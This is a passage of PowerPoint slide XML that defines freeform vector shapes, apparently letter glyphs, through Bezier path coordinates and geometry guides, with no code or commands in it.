                    <a:pt x="203" y="159"/>
                    <a:pt x="168" y="191"/>
                    <a:pt x="133" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="191"/>
                    <a:pt x="77" y="147"/>
                    <a:pt x="77" y="123"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="87"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="196"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="217"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="174"/>
                    <a:pt x="237" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="49"/>
                    <a:pt x="193" y="0"/>
                    <a:pt x="140" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="0"/>
                    <a:pt x="94" y="9"/>
                    <a:pt x="77" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="10"/>
                    <a:pt x="76" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="299"/>
                    <a:pt x="0" y="299"/>
                    <a:pt x="0" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="329"/>
                    <a:pt x="13" y="329"/>
                    <a:pt x="20" y="329"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="329"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="329"/>
                    <a:pt x="119" y="329"/>
                    <a:pt x="119" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="299"/>
                    <a:pt x="107" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="19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69" name="Freeform 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77FED42B-99E3-4811-8D40-B1C9F4402091}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId107"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3200400" y="2576513"/>
              <a:ext cx="88900" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 98 w 212"/>
                <a:gd name="T1" fmla="*/ 92 h 279"/>
                <a:gd name="T2" fmla="*/ 180 w 212"/>
                <a:gd name="T3" fmla="*/ 92 h 279"/>
                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 279"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 61 h 279"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 20 h 279"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 279"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 20 h 279"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 61 h 279"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 61 h 279"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 279"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 279"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 279"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 279 h 279"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 279"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 279"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 279"/>
                <a:gd name="T40" fmla="*/ 98 w 212"/>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79">
                  <a:moveTo>
                    <a:pt x="98" y="92"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="180" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="92"/>
                    <a:pt x="200" y="92"/>
                    <a:pt x="200" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="61"/>
                    <a:pt x="188" y="61"/>
                    <a:pt x="180" y="61"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="11"/>
                    <a:pt x="98" y="0"/>
                    <a:pt x="81" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="64" y="10"/>
                    <a:pt x="64" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="61"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="61"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="20" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="214"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="261"/>
                    <a:pt x="98" y="279"/>
                    <a:pt x="134" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="279"/>
                    <a:pt x="212" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212" y="194"/>
                    <a:pt x="194" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="194"/>
                    <a:pt x="177" y="205"/>
                    <a:pt x="177" y="213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="244"/>
                    <a:pt x="148" y="249"/>
                    <a:pt x="137" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="249"/>
                    <a:pt x="98" y="223"/>
                    <a:pt x="98" y="211"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="98"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0" name="Freeform 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E33C8CE1-530F-4148-8F88-DD6E144BD8B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId108"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3317875" y="2574925"/>
              <a:ext cx="87313" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 206"/>
                <a:gd name="T1" fmla="*/ 141 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 125 h 249"/>
                <a:gd name="T4" fmla="*/ 197 w 206"/>
                <a:gd name="T5" fmla="*/ 109 h 249"/>
                <a:gd name="T6" fmla="*/ 31 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 18 w 206"/>
                <a:gd name="T9" fmla="*/ 0 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 17 h 249"/>
                <a:gd name="T12" fmla="*/ 12 w 206"/>
                <a:gd name="T13" fmla="*/ 34 h 249"/>
                <a:gd name="T14" fmla="*/ 155 w 206"/>
                <a:gd name="T15" fmla="*/ 125 h 249"/>
                <a:gd name="T16" fmla="*/ 12 w 206"/>
                <a:gd name="T17" fmla="*/ 215 h 249"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 18 w 206"/>
                <a:gd name="T21" fmla="*/ 249 h 249"/>
                <a:gd name="T22" fmla="*/ 31 w 206"/>
                <a:gd name="T23" fmla="*/ 245 h 249"/>
                <a:gd name="T24" fmla="*/ 195 w 206"/>
                <a:gd name="T25" fmla="*/ 14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49">
                  <a:moveTo>
                    <a:pt x="195" y="141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="138"/>
                    <a:pt x="206" y="134"/>
                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="219"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="244"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="31" y="245"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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1" name="Freeform 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F46A199-4C49-410A-B45B-841ED76B1628}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId109"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3427413" y="2605088"/>
              <a:ext cx="100013" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 222"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="81" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="82" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="175"/>
                    <a:pt x="130" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="150" y="11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2" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A928B08C-BFE2-494B-9AEF-8D278108D0BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId110"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3540125" y="2560638"/>
              <a:ext cx="85725" cy="157163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 119 w 204"/>
                <a:gd name="T1" fmla="*/ 21 h 305"/>
                <a:gd name="T2" fmla="*/ 99 w 204"/>
                <a:gd name="T3" fmla="*/ 0 h 305"/>
                <a:gd name="T4" fmla="*/ 21 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 305"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 16 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 204"/>
                <a:gd name="T9" fmla="*/ 31 h 305"/>
                <a:gd name="T10" fmla="*/ 85 w 204"/>
                <a:gd name="T11" fmla="*/ 31 h 305"/>
                <a:gd name="T12" fmla="*/ 85 w 204"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 204"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 204"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 204"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 204 w 204"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 184 w 204"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 119 w 204"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 119 w 204"/>
                <a:gd name="T29" fmla="*/ 2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305">
                  <a:moveTo>
                    <a:pt x="119" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="5"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="85" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="305"/>
                    <a:pt x="204" y="305"/>
                    <a:pt x="204" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="275"/>
                    <a:pt x="192" y="275"/>
                    <a:pt x="184" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="119" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="2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3" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FFADFD3-78F8-4C26-8CB4-B1E318E1E201}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId111"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3649663" y="2605088"/>
              <a:ext cx="85725" cy="114300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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4" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBCD6D4-9492-4547-8E92-E73194060D48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId112"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3756025" y="2605088"/>
              <a:ext cx="95250" cy="112713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
